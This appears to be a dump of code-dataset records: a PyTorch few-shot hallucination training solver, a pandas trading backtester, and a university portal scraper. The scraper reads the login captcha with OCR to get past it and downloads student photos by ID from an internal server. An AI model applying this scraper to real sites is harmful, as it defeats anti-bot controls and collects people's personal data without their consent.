torch.cuda.LongTensor([label_encoder[class_name] for class_name in target[self.N_way_train * self.N_shot_train:]])\n\n real_label = torch.full((self.N_way_train * self.N_shot_val,), 1., dtype=torch.float, device=self.device)\n real_label_g = torch.full((self.N_way_train * self.M_aug_train,), 1., dtype=torch.float, device=self.device)\n fake_label_g = torch.full((self.N_way_train * self.M_aug_train,), 0., dtype=torch.float, device=self.device)\n\n ################\n # update D #\n ################\n support = self.cnn(support_input)\n queries = self.cnn(query_input)\n\n sample_idx = torch.tensor([torch.randint(self.N_shot_train * i, self.N_shot_train * (i + 1), (self.M_aug_train,)).numpy() for i in range(self.N_way_train)]).reshape(-1)\n noise = torch.randn((self.N_way_train * self.M_aug_train, self.nz), device=self.device)\n\n sample = support[sample_idx]\n support_g = self.g(sample, noise)\n\n if ep >= self.active_adversarial_loss_step:\n for _ in range(self.num_d_steps):\n self.optimizer_d.zero_grad()\n self.optimizer.zero_grad()\n\n d_loss_adv_fake = adversarial_criterion(self.d(support_g.detach()).view(-1), fake_label_g)\n d_loss_adv_real = adversarial_criterion(self.d(support.detach()).view(-1), real_label)\n\n d_loss = self.alpha_weight * (d_loss_adv_fake + d_loss_adv_real)\n d_loss.backward()\n self.optimizer_d.step()\n\n else:\n d_loss_adv_fake = torch.tensor(0).cuda()\n d_loss_adv_real = torch.tensor(0).cuda()\n d_loss = torch.tensor(0).cuda()\n d_loss_task = torch.tensor(0).cuda()\n\n ################\n # update H #\n ################\n self.optimizer_d.zero_grad()\n self.optimizer.zero_grad()\n\n if ep >= self.active_adversarial_loss_step:\n h_loss_adv = adversarial_criterion(self.d(support_g).view(-1), real_label_g)\n else:\n h_loss_adv = torch.tensor(0).cuda()\n\n support_g_r = support_g.reshape(self.N_way_train, self.M_aug_train, -1)\n support_r = support.reshape(self.N_way_train, self.N_shot_train, -1)\n\n support_aug = torch.cat([support_r, support_g_r], dim=1)\n support_aug = support_aug.reshape(self.N_way_train * (self.N_shot_train + self.M_aug_train), -1)\n\n prototypes = self.mlp(support_aug)\n prototypes = prototypes.reshape(self.N_way_train, self.N_shot_train + self.M_aug_train, -1).mean(dim=1)\n queries = self.mlp(queries)\n\n if self.matching_fn == 'parametric':\n distances = pairwise_distances(queries, prototypes, self.matching_fn, self.parametric)\n\n else:\n distances = pairwise_distances(queries, prototypes, self.matching_fn)\n\n h_loss_task = task_criterion(-distances, query_label)\n h_loss = self.alpha_weight * h_loss_adv + h_loss_task\n h_loss.backward()\n self.optimizer.step()\n\n y_pred = (-distances).softmax(dim=1).max(1, keepdim=True)[1]\n episodic_acc.append(1. 
* y_pred.eq(query_label.view_as(y_pred)).sum().item() / len(query_label))\n\n if (iteration + 1) % self.log_interval == 0:\n episodic_acc = np.array(episodic_acc)\n mean = episodic_acc.mean()\n std = episodic_acc.std()\n episodic_acc = []\n\n print('Epoch: {:3d} [{:d}/{:d}] Iteration: {:5d} h_loss: {:.4f} h_loss_adv: {:.4f} h_loss_task: {:.4f} d_loss: {:.4f} d_loss_adv_fake: {:.4f} d_loss_adv_real: {:.4f} Accuracy: {:.2f} +- {:.2f} %'.format(\n ep, (batch_idx + 1), len(self.train_loader), iteration + 1, \n h_loss.item(), h_loss_adv.item(), h_loss_task.item(), \n d_loss.item(), d_loss_adv_fake.item(), d_loss_adv_real.item(),\n mean * 100, 1.96 * std / (self.log_interval)**(1/2) * 100))\n\n if self.use_wandb:\n import wandb\n wandb.log({\n 'h_loss': h_loss.item(),\n 'h_loss_adv': h_loss_adv.item(),\n 'h_loss_task': h_loss_task.item(),\n 'd_loss': d_loss.item(),\n 'd_loss_adv_fake': d_loss_adv_fake.item(),\n 'd_loss_adv_real': d_loss_adv_real.item(),\n \"acc_mean\": mean * 100,\n \"acc_ci\": 1.96 * std / (self.log_interval)**(1/2) * 100,\n 'lr': self.optimizer.param_groups[0]['lr']\n }, step=iteration+1)\n\n\n\n if (iteration + 1) % self.ckp_interval == 0:\n loss, mean, std = self.eval()\n if mean > best_mean:\n best_mean = mean\n self.save_checkpoint(iteration)\n if self.use_wandb:\n wandb.run.summary[\"best_accuracy\"] = best_mean * 100\n\n if self.use_wandb:\n import wandb\n wandb.log({\"val_loss\": loss,\n \"val_acc_mean\": mean * 100,\n \"val_acc_ci\": 1.96 * std / (600)**(1/2) * 100}, \n step=iteration+1, commit=False)\n\n iteration += 1\n\n self.scheduler.step()\n self.scheduler_d.step()\n\n def eval(self):\n criterion = nn.CrossEntropyLoss()\n self.cnn.eval()\n self.g.eval()\n self.mlp.eval()\n self.d.eval()\n episodic_acc = []\n loss = []\n \n with torch.no_grad():\n for b_idx, (data, target) in enumerate(self.val_loader):\n data = data.to(self.device)\n support_input = data[:self.N_way_val * self.N_shot_val,:,:,:] \n query_input = data[self.N_way_val * self.N_shot_val:,:,:,:]\n\n label_encoder = {target[i * self.N_shot_val] : i for i in range(self.N_way_val)}\n query_label = torch.cuda.LongTensor([label_encoder[class_name] for class_name in target[self.N_way_val * self.N_shot_val:]])\n\n support = self.cnn(support_input)\n queries = self.cnn(query_input)\n\n sample_idx = self.sample_idx_val[b_idx]\n sample = support[sample_idx]\n \n noise = self.noise_val[b_idx]\n\n support_g = self.g(sample, noise).reshape(self.N_way_val, self.M_aug_val, -1)\n support = support.reshape(self.N_way_val, self.N_shot_val, -1)\n\n support_aug = torch.cat([support, support_g], dim=1)\n support_aug = support_aug.reshape(self.N_way_val * (self.N_shot_val + self.M_aug_val), -1)\n\n prototypes = self.mlp(support_aug)\n prototypes = prototypes.reshape(self.N_way_val, self.N_shot_val + self.M_aug_val, -1).mean(dim=1)\n queries = self.mlp(queries)\n\n if self.matching_fn == 'parametric':\n distances = pairwise_distances(queries, prototypes, self.matching_fn, self.parametric)\n else:\n distances = pairwise_distances(queries, prototypes, self.matching_fn)\n \n loss.append(criterion(-distances, query_label).item())\n y_pred = (-distances).softmax(dim=1).max(1, keepdim=True)[1]\n episodic_acc.append(1. 
* y_pred.eq(query_label.view_as(y_pred)).sum().item() / len(query_label))\n\n loss = np.array(loss)\n episodic_acc = np.array(episodic_acc)\n loss = loss.mean()\n mean = episodic_acc.mean()\n std = episodic_acc.std()\n\n print('\\nLoss: {:.6f} Accuracy: {:.2f} +- {:.2f} %\\n'.format(loss,mean * 100, 1.96 * std / (600)**(1/2) * 100))\n\n return loss, mean, std\n", "sub_path": "hw4/improved_data_hallucination/solver.py", "file_name": "solver.py", "file_ext": "py", "file_size_in_byte": 14587, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "torch.cuda.is_available", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 15, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 16, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path", "line_number": 43, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 44, "usage_type": "call"}, {"api_name": "model.Convnet", "line_number": 53, "usage_type": "call"}, {"api_name": "model.Hallucinator", "line_number": 54, "usage_type": "call"}, {"api_name": "model.MLP", "line_number": 55, "usage_type": "call"}, {"api_name": "model.Discriminator", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.optim.AdamW", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 58, "usage_type": "attribute"}, {"api_name": "torch.optim.AdamW", "line_number": 59, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 59, "usage_type": "attribute"}, {"api_name": "torch.nn.Sequential", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 62, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 63, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 63, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 64, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 64, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 65, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 66, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 66, "usage_type": "name"}, {"api_name": "torch.optim.AdamW", "line_number": 68, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 68, "usage_type": "attribute"}, {"api_name": "torch.optim.lr_scheduler.StepLR", "line_number": 70, "usage_type": "call"}, {"api_name": "torch.optim.lr_scheduler.StepLR", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 84, "usage_type": "call"}, {"api_name": "os.path", "line_number": 84, "usage_type": "attribute"}, {"api_name": "torch.save", "line_number": 85, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 90, "usage_type": "call"}, {"api_name": "os.path", "line_number": 90, "usage_type": "attribute"}, {"api_name": "torch.load", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 103, "usage_type": "name"}, {"api_name": "torch.nn.BCELoss", "line_number": 104, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 104, "usage_type": "name"}, {"api_name": "torch.tensor", "line_number": 114, "usage_type": "call"}, {"api_name": 
"torch.randint", "line_number": 114, "usage_type": "call"}, {"api_name": "torch.randn", "line_number": 115, "usage_type": "call"}, {"api_name": "torch.cuda.LongTensor", "line_number": 139, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 139, "usage_type": "attribute"}, {"api_name": "torch.full", "line_number": 141, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 141, "usage_type": "attribute"}, {"api_name": "torch.full", "line_number": 142, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 142, "usage_type": "attribute"}, {"api_name": "torch.full", "line_number": 143, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 143, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 151, "usage_type": "call"}, {"api_name": "torch.randint", "line_number": 151, "usage_type": "call"}, {"api_name": "torch.randn", "line_number": 152, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 170, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 171, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 172, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 173, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 184, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 189, "usage_type": "call"}, {"api_name": "utils.pairwise_distances", "line_number": 197, "usage_type": "call"}, {"api_name": "utils.pairwise_distances", "line_number": 200, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 211, "usage_type": "call"}, {"api_name": "wandb.log", "line_number": 224, "usage_type": "call"}, {"api_name": "wandb.run", "line_number": 244, "usage_type": "attribute"}, {"api_name": "wandb.log", "line_number": 248, "usage_type": "call"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 259, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 259, "usage_type": "name"}, {"api_name": "torch.no_grad", "line_number": 267, "usage_type": "call"}, {"api_name": "torch.cuda.LongTensor", "line_number": 274, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 274, "usage_type": "attribute"}, {"api_name": "torch.cat", "line_number": 287, "usage_type": "call"}, {"api_name": "utils.pairwise_distances", "line_number": 295, "usage_type": "call"}, {"api_name": "utils.pairwise_distances", "line_number": 297, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 303, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 304, "usage_type": "call"}]} +{"seq_id": "535976039", "text": "import requests\r\nimport re\r\nfrom PIL import Image\r\nfrom bs4 import BeautifulSoup\r\nimport pytesseract\r\nfrom lxml import etree\r\nsession=requests.session()\r\nCookies={}\r\nheaders={\r\n 'Host':'rz.wzu.edu.cn',\r\n 'Origin':'http://rz.wzu.edu.cn',\r\n 'Referer':'http://rz.wzu.edu.cn/zfca/login',\r\n 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.119 Safari/537.36'\r\n}\r\n\r\ndef get_photonumble():#获取验证码,由于是session,所以完全可以使用这个,不用担心验证码和其他的不准确性。\r\n code = session.get('http://rz.wzu.edu.cn/zfca/captcha.htm')\r\n with open(\"D://1.jpg\", 'wb') as f:\r\n f.write(code.content)\r\n f.close()\r\n im = Image.open(\"D://1.jpg\")\r\n text = pytesseract.image_to_string(im)\r\n return text\r\n\r\ndef login(numble,user,pwd):#用户登录\r\n global cookiejars\r\n postdata = {\r\n \"username\": user,\r\n \"password\": pwd,\r\n \"useValidateCode\": \"1\",\r\n 
\"isremenberme\": \"1\",\r\n \"ip\": \" \",\r\n 'lt': '',\r\n '_eventId': 'submit',\r\n 'losetime': '30',\r\n 'j_captcha_response': numble,\r\n 'rememberMe': 'true'\r\n }\r\n login_page=session.get('http://rz.wzu.edu.cn/zfca/login',headers=headers)\r\n soup=BeautifulSoup(login_page.text,'lxml')\r\n soup=soup.find(attrs={'name':'lt'})\r\n postdata['lt']=soup['value']\r\n session.post('http://rz.wzu.edu.cn/zfca/login',data=postdata,headers=headers)\r\n\r\n session.get('http://rz.wzu.edu.cn/zfca/login?yhlx=student&login=0122579031373493708&url=xs_main.aspx')#获取session_id\r\n\r\n for key,value in dict(session.cookies.get_dict()).items():\r\n Cookies[key] = value\r\n page=session.get('http://portal.wzu.edu.cn/portal.do?caUserName=17211134120').text\r\n\r\n\r\n page=BeautifulSoup(page,'html.parser')\r\n try:\r\n ans = page.find('title').string\r\n name = page.find('em').string.split(': ')[-1]\r\n\r\n return [ans,name]\r\n except:\r\n return ['none','none']\r\ndef getmessage(user,name):#获取个人信息里面的东西\r\n headers['Referer'] = 'http://jwc3.wzu.edu.cn/xs_main.aspx?xh=%s&type=1' % (user)\r\n headers['Host'] = 'jwc3.wzu.edu.cn'\r\n headers['Upgrade-Insecure-Requests'] = '1'\r\n headers['Accept'] = 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8'\r\n url = 'http://jwc3.wzu.edu.cn/xsgrxx.aspx?xh=%s&xm=%s&gnmkdm=N121501' % (user, name)\r\n page = session.get(url, headers=headers, cookies=Cookies)#这里是获取个人信息,由于不知道要什么信息,所以先以message的信息存储。\r\n page=BeautifulSoup(page.text,'html.parser')\r\ndef get_userphoto(user):#获取user对应的图片\r\n\r\n r = session.get('http://192.168.10.3/xgxt/xsxx_xsgl.do?method=showPhoto&xh=%s' % (user))\r\n if len(r.content) > 10000:\r\n root = 'E://pt/%s.jpeg' % (user)\r\n with open(root, 'wb+') as f:\r\n f.write(r.content)\r\n f.close()\r\n im = Image.open(root)#弹出图片\r\n im.show()\r\ndef process():\r\n user=input(\"学号:\")\r\n pwd=input(\"密码:\")\r\n\r\n for i in range(3):#进行三次登录,如果不行就说明失败\r\n numble = get_photonumble()\r\n anss = login(numble, user, pwd)\r\n ans = anss[0]\r\n name = anss[1]\r\n if re.findall(\"个人门户\", ans):\r\n print(\"登录成功\")\r\n getmessage(user, name)\r\n break\r\n else:\r\n print(\"failed\")\r\n\r\nif __name__ == '__main__':\r\n process()", "sub_path": "Spider/demo.py", "file_name": "demo.py", "file_ext": "py", "file_size_in_byte": 3550, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "requests.session", "line_number": 7, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 21, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 21, "usage_type": "name"}, {"api_name": "pytesseract.image_to_string", "line_number": 22, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 40, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 52, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 67, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 76, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 76, "usage_type": "name"}, {"api_name": "re.findall", "line_number": 87, "usage_type": "call"}]} +{"seq_id": "369785301", "text": "\"\"\"\r\n\r\nThe Main class for backtesting.\r\nSome variables have defaults but can be overwritten\r\n\r\nUse vantage_pull to update data daily\r\n\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\nclass Mint_Cash():\r\n \r\n def __init__(self, daf, \r\n short_ma_x, \r\n std = 1.2,\r\n hskl = 80,\r\n 
lskl = 20,\r\n sd = 3,\r\n sl = 7,\r\n print_port=False,\r\n print_plot=False):\r\n\r\n self.df = daf\r\n self.df.index = pd.to_datetime(self.df.index)\r\n self.df.sort_index(inplace=True)\r\n self.hskl = hskl\r\n self.lskl = lskl\r\n \r\n###Moving Averages\r\n self.df.loc[:, \"short_ma\"] = self.df.loc[:, \"close\"].rolling(5, center=False).mean()\r\n self.df.loc[:, \"ewma\"] = self.df.loc[:, \"close\"].ewm(span=short_ma_x).mean()\r\n self.df.loc[:, \"bb_upper\"] = self.df.loc[:, \"ewma\"] + self.df.loc[:,\"close\"].rolling(short_ma_x, center=False).std()*std\r\n self.df.loc[:, \"bb_lower\"] = self.df.loc[:, \"ewma\"] - self.df.loc[:,\"close\"].rolling(short_ma_x, center=False).std()*std \r\n self.df.loc[:, 'timestamp'] = self.df.index\r\n\r\n\r\n###Mathematical Derivatives\r\n self.df.loc[:, \"first_diff\"] = self.df.loc[:, \"ewma\"].rolling(10, center=False).mean().diff()\r\n self.df.loc[:, \"second_diff\"] = self.df.loc[:, \"ewma\"].rolling(10, center=False).mean().diff().diff()\r\n self.df.loc[:, \"third_diff\"] = self.df.loc[:, \"ewma\"].rolling(10, center=False).mean().diff().diff().diff()\r\n self.df.loc[:, \"fd_high\"] = abs(self.df.loc[:, \"first_diff\"] + self.df.loc[:, \"first_diff\"].rolling(short_ma_x, center=False).std()*std)\r\n self.df.loc[:, \"fd_low\"] = 0 - abs(abs(self.df.loc[:, \"first_diff\"]) + self.df.loc[:, \"first_diff\"].rolling(short_ma_x, center=False).std()*std)\r\n self.df.reset_index(drop=True, inplace=True)\r\n\r\n###Stochastic Oscillator \r\n self.df.loc[:, \"stoch_high\"] = self.df.loc[:, \"close\"].rolling(short_ma_x, center=False).max()\r\n self.df.loc[:, \"stoch_low\"] = self.df.loc[:, \"close\"].rolling(short_ma_x, center=False).min()\r\n self.df.loc[:, \"stoch_k\"] = 100 * (self.df.loc[:, \"close\"] - self.df.loc[:, \"stoch_low\"])/(self.df.loc[:, \"stoch_high\"] - self.df.loc[:, \"stoch_low\"])\r\n self.df.loc[:, \"stoch_d\"] = self.df.loc[:, \"stoch_k\"].rolling(sd, center=False).mean()\r\n self.df.loc[:, \"stoch_l\"] = self.df.loc[:, \"stoch_k\"].rolling(sl, center=False).mean()\r\n \r\n###Misc Settings\r\n self.print_port = print_port\r\n self.print_plot = print_plot\r\n \r\n def trader(self):\r\n self.initial_capital = 10000\r\n self.leverage = 1\r\n \r\n self.position = False\r\n \r\n #Build portfolio\r\n portfolio = pd.DataFrame(index=self.df.index)\r\n portfolio['cash'] = 0\r\n portfolio.loc[0, 'cash'] = self.initial_capital #['cash'][0] = initial_capital\r\n portfolio.loc[0, 'holdings'] = 0\r\n portfolio['close'] = self.df['close']\r\n portfolio['signal'] = 0\r\n \r\n def print_status(i):\r\n print(\"\\n\", i, \"ewma, close, upper, lower\",\r\n self.df.loc[i, 'ewma'],\r\n self.df.loc[i, 'close'],\r\n self.df.loc[i, 'bb_upper'],\r\n self.df.loc[i, 'bb_lower'])\r\n \r\n #Define trading actions \r\n def same(i):\r\n portfolio.loc[i, \"AAPL\"] = portfolio.loc[i-1, \"AAPL\"]\r\n portfolio.loc[i, 'cash'] = portfolio.loc[i-1, 'cash']\r\n portfolio.loc[i, 'holdings'] = portfolio.loc[i-1, 'AAPL'] * self.df.loc[i-1, 'close']\r\n portfolio.loc[i, 'signal'] = 0\r\n \r\n def enter_long(i):\r\n portfolio.loc[i,\"AAPL\"] = portfolio.loc[i, 'cash']/self.df.loc[i, 'close']\r\n portfolio.loc[i,'cash'] = 0\r\n portfolio.loc[i, 'holdings'] = portfolio.loc[i, \"AAPL\"] * self.df.loc[i, 'close']\r\n portfolio.loc[i, 'signal'] = 1\r\n self.position = 'long'\r\n \r\n def exit_long(i):\r\n portfolio.loc[i, 'cash'] = portfolio.loc[i, 'AAPL'] * self.df.loc[i, 'close']\r\n portfolio.loc[i, \"AAPL\"] = 0\r\n portfolio.loc[i, 'holdings'] = 0\r\n self.position = 
False\r\n portfolio.loc[i, 'signal'] = 2\r\n \r\n def enter_short(i):\r\n portfolio.loc[i, 'cash'] = portfolio.loc[i, 'cash']\r\n portfolio.loc[i, 'AAPL'] = (portfolio.loc[i, 'cash']/self.df.loc[i, 'close'])*-1\r\n portfolio.loc[i, 'holdings'] = (portfolio.loc[i, 'AAPL']*self.df.loc[i, 'close'])\r\n self.position = 'short'\r\n self.short_enter_price = self.df.loc[i, 'close']\r\n portfolio.loc[i, 'signal'] = -1\r\n \r\n def exit_short(i):\r\n portfolio.loc[i, 'AAPL'] = 0\r\n portfolio.loc[i, 'cash'] = (portfolio.loc[i, 'AAPL']*(self.short_enter_price - self.df.loc[i, 'close'])*-1) + portfolio.loc[i, 'cash']\r\n portfolio.loc[i, 'holdings'] = 0\r\n self.position = False\r\n portfolio.loc[i, 'signal'] = -2\r\n \r\n for i, index in enumerate(self.df.index):\r\n \r\n #set troubleshooting range\r\n if i > 50 and i < 0:\r\n self.b_s = True\r\n print_status(i) \r\n else: \r\n self.b_s = False\r\n \r\n #If we are on the last row of the dataframe, exit all positions\r\n if i == len(self.df.index)-1:\r\n same(i)\r\n if self.position == 'short':\r\n exit_short(i)\r\n if self.position == 'long':\r\n exit_long(i)\r\n \r\n elif i >= 3:\r\n #Update all variables\r\n #Initialize variables to reduce typing\r\n ewma = self.df.loc[i-1, 'ewma']\r\n close = self.df.loc[i-1, 'close']\r\n bb_upper = self.df.loc[i-1, 'bb_upper']\r\n bb_lower = self.df.loc[i-1, 'bb_lower']\r\n fd = self.df.loc[i-1, \"first_diff\"]\r\n sd = self.df.loc[i-1, \"second_diff\"]\r\n td = self.df.loc[i-1, \"third_diff\"]\r\n fd_high = self.df.loc[i-1, \"fd_high\"]\r\n fd_low = self.df.loc[i-1, \"fd_low\"]\r\n# sd_high = self.df.loc[i-1, \"sd_high\"]\r\n# sd_low = self.df.loc[i-1, \"sd_low\"]\r\n stoch_d = self.df.loc[i-1, \"stoch_d\"]\r\n hskl = self.hskl\r\n lskl = self.lskl\r\n \r\n same(i)\r\n \r\n ###GOING LONG###\r\n if(\r\n (lskl < stoch_d < hskl) and #If stock is stable\r\n (\r\n (sd > 0) or #Stock is gaining upward\r\n (close < bb_lower) #Momentum but closed low\r\n ) or \r\n (\r\n stoch_d > hskl and #Stock is trending up\r\n close < ewma #and closed lower than average\r\n )\r\n \r\n ):\r\n \r\n if self.position == 'long':\r\n same(i)\r\n \r\n if self.position == 'short':\r\n exit_short(i)\r\n enter_long(i)\r\n \r\n if not self.position:\r\n enter_long(i)\r\n \r\n ###SHORTING###\r\n elif(\r\n (lskl < stoch_d < hskl) and \r\n (\r\n (sd < 0) or\r\n (close > bb_upper)\r\n ) or \r\n (\r\n stoch_d < lskl and\r\n close > ewma\r\n ) \r\n ):\r\n \r\n if self.position == 'short':\r\n same(i)\r\n\r\n if self.position == 'long':\r\n exit_long(i)\r\n enter_short(i)\r\n \r\n if not self.position:\r\n enter_short(i)\r\n\r\n else:\r\n same(i)\r\n \r\n #To avoid Index Errors with the i-1 references in the loop we stay\r\n #the same for the first 3 iterations\r\n elif i < 3:\r\n portfolio.loc[i, \"AAPL\"] = 0\r\n portfolio.loc[i, 'cash'] = self.initial_capital\r\n portfolio.loc[i, 'holdings'] = 0\r\n \r\n else:\r\n print(\"\\nfailed with:\")\r\n break\r\n if i > i: print(\"Missed at:\", i)\r\n\r\n portfolio.loc[i, 'total'] = portfolio.loc[i, 'cash'] + portfolio.loc[i, 'holdings']\r\n ###END FOR LOOP###\r\n \r\n if self.print_port:\r\n with pd.option_context('display.max_rows', None, 'display.max_columns', 3):\r\n print(portfolio)\r\n \r\n #Visualize Portfolio Value\r\n fig = plt.figure()\r\n \r\n ax1 = fig.add_subplot(111, ylabel='Portfolio value in $')\r\n \r\n portfolio['total'].plot(ax=ax1, lw=.2, figsize=(12,8))\r\n# plt.xlim(20, 60)\r\n # Show the plot\r\n plt.show()\r\n \r\n# print(\"Weekly Goals: \", self.weekly_goals_met, \"\\nMonthly 
Goals:\", self.monthly_goals_met)\r\n portfolio.to_csv('C:/python/20cash17/portfolio.csv')\r\n \r\n if self.print_plot:\r\n start_win = 40\r\n end_win = 100\r\n \r\n fig = plt.figure(figsize=(12,12))\r\n### AX 1\r\n ax1 = fig.add_subplot(311)\r\n \r\n ax1.plot(self.df.loc[:, \"short_ma\"], linestyle='--', linewidth=1)\r\n ax1.plot(self.df.loc[:, \"ewma\"], linestyle='--', linewidth=4)\r\n# ax1.plot(self.df.loc[:, \"l_ewma\"], linestyle=':', linewidth=4)\r\n ax1.plot(self.df.loc[:, \"close\"], linewidth=4)\r\n ax1.plot(self.df.loc[:, \"bb_upper\"], color='r', linestyle=':', linewidth=.4)\r\n ax1.plot(self.df.loc[:, \"bb_lower\"], color='r', linestyle=':', linewidth=.4) \r\n \r\n #Enter Long\r\n ax1.plot(portfolio.loc[portfolio.loc[:, 'signal'] == 1.0].index, \r\n self.df.close[portfolio.loc[:, 'signal'] == 1.0],\r\n '^', markersize = 10.0, color='m')\r\n \r\n #Enter Short\r\n ax1.plot(portfolio.loc[portfolio.loc[:, 'signal'] == -1.0].index, \r\n self.df.close[portfolio.loc[:, 'signal'] == -1.0],\r\n 'v', markersize = 10.0, color='m')\r\n #Exit Long\r\n ax1.plot(portfolio.loc[portfolio.loc[:, 'signal'] == 2.0].index, \r\n self.df.close[portfolio.loc[:, 'signal'] == 2.0],\r\n '^', markersize = 10.0, color='r')\r\n #Exit Short\r\n ax1.plot(portfolio.loc[portfolio.loc[:, 'signal'] == -2.0].index, \r\n self.df.close[portfolio.loc[:, 'signal'] == -2.0],\r\n 'v', markersize = 10.0, color='r')\r\n #Stay Same\r\n ax1.plot(portfolio.loc[portfolio.loc[:, 'signal'] == 0.0].index, \r\n self.df.close[portfolio.loc[:, 'signal'] == 0.0],\r\n 'o', markersize = 10.0, color='m')\r\n \r\n plt.xlim(start_win,end_win)\r\n \r\n ax1.grid()\r\n \r\n### AX 2: Derivatives\r\n ax2 = fig.add_subplot(312)\r\n \r\n ax2.plot(self.df.loc[:, \"first_diff\"], color = 'b', linestyle='--')\r\n ax2.plot(self.df.loc[:, \"second_diff\"], color = 'g', linestyle='--')\r\n\r\n# ax2.plot(self.df.loc[:, \"third_diff\"], color = 'y', linestyle='--')\r\n# ax2.plot(self.df.loc[:, \"fd_high\"], color = 'b', linestyle=':')\r\n# ax2.plot(self.df.loc[:, \"fd_low\"], color = 'b', linestyle=':')\r\n# ax2.plot(self.df.loc[:, \"sd_high\"], color = 'g', linestyle=':')\r\n# ax2.plot(self.df.loc[:, \"sd_low\"], color = 'g', linestyle=':')\r\n \r\n plt.xlim(start_win,end_win) \r\n ax2.grid()\r\n \r\n### AX 3: Stochastic\r\n ax3 = fig.add_subplot(313)\r\n ax3.plot(self.df.loc[:, \"stoch_k\"])\r\n ax3.plot(self.df.loc[:, \"stoch_d\"])\r\n ax3.plot(self.df.loc[:, \"stoch_l\"])\r\n ax3.grid()\r\n \r\n #Plot it:\r\n fig.tight_layout()\r\n plt.xlim(start_win,end_win)\r\n plt.show()\r\n \r\n return int(portfolio['total'].tail(1)), self.df.loc[:, 'close'].std()", "sub_path": "mint_cash.py", "file_name": "mint_cash.py", "file_ext": "py", "file_size_in_byte": 13157, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pandas.to_datetime", "line_number": 27, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 66, "usage_type": "call"}, {"api_name": "pandas.option_context", "line_number": 219, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 223, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 223, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 230, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 230, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 239, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 239, 
"usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 272, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 272, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 288, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 288, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 300, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 300, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 301, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 301, "usage_type": "name"}]} +{"seq_id": "394627934", "text": "#!/usr/bin/env python 3\n# -*- coding: utf-8 -*-\n\"\"\"\nbrief\nAuthors: zuyunbo\nDate: 2021/07/21 16:24:00\n\"\"\"\nimport json\nimport requests\nimport time\nimport sys\nimport hashlib\nfrom lxml import etree\nfrom datetime import datetime\n\n\nfrom data_writer.data_writer import 